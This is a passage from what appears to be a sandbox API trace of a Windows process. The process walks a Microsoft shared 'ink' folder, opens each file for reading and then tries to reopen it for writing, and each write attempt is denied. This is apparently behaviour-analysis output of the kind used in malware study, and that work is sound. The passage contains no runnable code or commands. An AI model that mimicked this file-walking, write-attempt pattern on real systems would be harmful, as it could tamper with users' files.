(HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4aee0 [0099.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0099.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0099.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aee0 | out: hHeap=0x20000) returned 1 [0099.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.506] AreFileApisANSI () returned 1 [0099.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", lpUsedDefaultChar=0x0) returned 89 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.506] AreFileApisANSI () returned 1 [0099.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0099.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0099.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 89 [0099.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.507] GetFileType (hFile=0x27c) returned 0x1 [0099.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.507] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.507] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.507] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.507] CloseHandle (hObject=0x27c) returned 1 [0099.507] AreFileApisANSI () returned 1 [0099.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0099.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0099.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 89 [0099.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.508] GetLastError () returned 0x5 [0099.508] GetLastError () returned 0x5 [0099.508] SetLastError (dwErrCode=0x5) [0099.508] GetLastError () returned 0x5 [0099.508] SetLastError (dwErrCode=0x5) [0099.508] GetLastError () returned 0x5 [0099.508] SetLastError (dwErrCode=0x5) [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.508] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xb0, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x4ebd0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xb0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ǘ")) returned 0 [0099.508] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0099.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0099.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.509] AreFileApisANSI () returned 1 [0099.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml", lpUsedDefaultChar=0x0) returned 77 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.509] AreFileApisANSI () returned 1 [0099.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cd88 [0099.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 77 [0099.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.510] GetFileType (hFile=0x418) returned 0x1 [0099.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.510] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.510] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.510] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.510] CloseHandle (hObject=0x418) returned 1 [0099.511] AreFileApisANSI () returned 1 [0099.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cc38 [0099.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8cc38, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml") returned 77 [0099.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.511] GetLastError () returned 0x5 [0099.511] GetLastError () returned 0x5 [0099.511] SetLastError (dwErrCode=0x5) [0099.511] GetLastError () returned 0x5 [0099.511] SetLastError (dwErrCode=0x5) [0099.511] GetLastError () returned 0x5 [0099.511] SetLastError (dwErrCode=0x5) [0099.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0099.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.511] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="osknav", cAlternateFileName="")) returned 1 [0099.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0099.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0099.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0099.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0099.512] AreFileApisANSI () returned 1 [0099.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav", lpUsedDefaultChar=0x0) returned 72 [0099.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.512] AreFileApisANSI () returned 1 [0099.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0099.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 72 [0099.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.512] GetLastError () returned 0x5 [0099.512] GetLastError () returned 0x5 [0099.512] SetLastError (dwErrCode=0x5) [0099.512] GetLastError () returned 0x5 [0099.512] SetLastError (dwErrCode=0x5) [0099.512] GetLastError () returned 0x5 [0099.513] SetLastError (dwErrCode=0x5) [0099.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0099.513] AreFileApisANSI () returned 1 [0099.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 72 [0099.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.513] GetLastError () returned 0x5 [0099.513] GetLastError () returned 0x5 [0099.513] SetLastError (dwErrCode=0x5) [0099.513] GetLastError () returned 0x5 [0099.513] SetLastError (dwErrCode=0x5) [0099.513] GetLastError () returned 0x5 [0099.513] SetLastError (dwErrCode=0x5) [0099.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0099.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.513] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0099.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.514] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x784d0 [0099.514] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327ed3c | out: 